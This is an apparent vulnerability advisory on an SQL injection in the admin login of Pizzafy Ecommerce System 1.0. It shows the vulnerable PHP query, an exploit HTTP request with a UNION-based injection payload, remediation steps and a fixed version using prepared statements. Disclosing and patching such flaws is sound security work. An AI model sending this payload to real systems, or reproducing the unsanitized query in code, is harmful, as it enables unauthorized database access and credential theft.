Pizzafy Ecommerce System 1.0 Admin SQL Injection Vulnerability Analysis

# Vulnerability Summary: SQL Injection Vulnerability in Pizzafy Ecommerce System 1.0 ## Vulnerability Overview - **Vulnerability Type**: Error-Based SQL Injection - **Severity**: HIGH - **Affected Version**: Pizzafy Ecommerce System 1.0 - **Vulnerable Location**: `/pizzafy/admin/ajax.php?action=login` - **Description**: The `username` parameter is not properly sanitized, allowing attackers to inject malicious SQL commands. ## Impact Scope | Impact Type | Description | |-------------|-------------| | Confidentiality | Full exposure of database structure and user credentials | | Integrity | Unauthorized deletion or modification of records | | Availability | Service disruption due to large-scale data deletion | | Privilege Escalation | Session hijacking and unauthorized admin access | ## Remediation 1. **Use Prepared Statements**: Employ parameterized queries to prevent SQL injection. 2. **Input Validation**: Strictly filter `username` and `password` parameters. 3. **Database Permission Restrictions**: Limit user privileges to minimize potential damage. 4. **Monitoring and Logging**: Track anomalous query patterns. 5. **Security Testing**: Conduct regular penetration testing and code reviews. 6. **Error Handling**: Avoid exposing database error messages in responses. ## Proof of Concept (POC) ### Vulnerable Code Snippet ```php public function login() { $username = isset($_POST['username']) ? $_POST['username'] : ''; $password = isset($_POST['password']) ? $_POST['password'] : ''; $qry = $this->conn->query("SELECT * FROM users WHERE username = '$username'"); if (!$qry) { return $this->conn->error; } if ($qry && $qry->num_rows > 0) { $row = $qry->fetch_assoc(); if (password_verify($password, $row['password'])) { $_SESSION['login_id'] = $row['id']; $_SESSION['login_name'] = $row['name']; $_SESSION['login_type'] = $row['type']; return 1; } return json_encode($row); } else { return 2; } } ``` ### Example Exploit Request ```http POST /pizzafy/admin/ajax.php?action=login HTTP/1.1 Host: localhost Content-Length: 73 sec-ch-ua: Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 1.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Origin: http://localhost Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost/pizzafy/admin/login.php Accept-Encoding: gzip, deflate Accept-Language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7 Cookie: PHPSESSID=04a312a9e4e4a1006bqunrp6 Connection: close username=-1' union select 1,2,database(),version(),5%23&password=password ``` ### Fixed Code ```php public function login() { $username = isset($_POST['username']) ? $_POST['username'] : ''; $password = isset($_POST['password']) ? $_POST['password'] : ''; $stmt = $this->conn->prepare("SELECT * FROM users WHERE username = ?"); $stmt->bind_param("s", $username); $stmt->execute(); $qry = $stmt->get_result(); if (!$qry) { return $this->conn->error; } if ($qry && $qry->num_rows > 0) { $row = $qry->fetch_assoc(); if (password_verify($password, $row['password'])) { $_SESSION['login_id'] = $row['id']; $_SESSION['login_name'] = $row['name']; $_SESSION['login_type'] = $row['type']; return 1; } return 2; } else { return 2; } } ```

Goal Reached Thanks to every supporter — we hit 100%!

Pizzafy Ecommerce System 1.0 Admin SQL Injection Vulnerability Analysis

More from this source